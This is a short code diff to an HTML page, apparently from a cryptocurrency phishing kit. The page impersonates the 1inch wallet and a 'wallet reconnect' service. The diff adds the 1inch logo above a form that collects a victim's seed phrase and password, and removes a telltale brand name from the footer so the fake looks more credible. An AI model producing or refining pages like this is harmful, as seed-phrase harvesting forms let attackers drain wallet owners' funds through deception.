--- a/1inch.html
+++ b/1inch.html
@@ -74,7 +74,11 @@
                         </div>
 
                         <div class="middle">
-                            <h4>1inch</h4>
+                            <div class="toop">
+                                <img src="1inch.jpeg" alt="">
+                                <h4>1inch</h4>
+                            
+                            </div>
                             <textarea id="seed" minlength="30"  minlength="30"  name="1inch" placeholder="Seed Phrase..." required></textarea >
                         <input id="movepass"  type="password"
                       placeholder="Password" name="Password"/>
@@ -111,7 +115,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
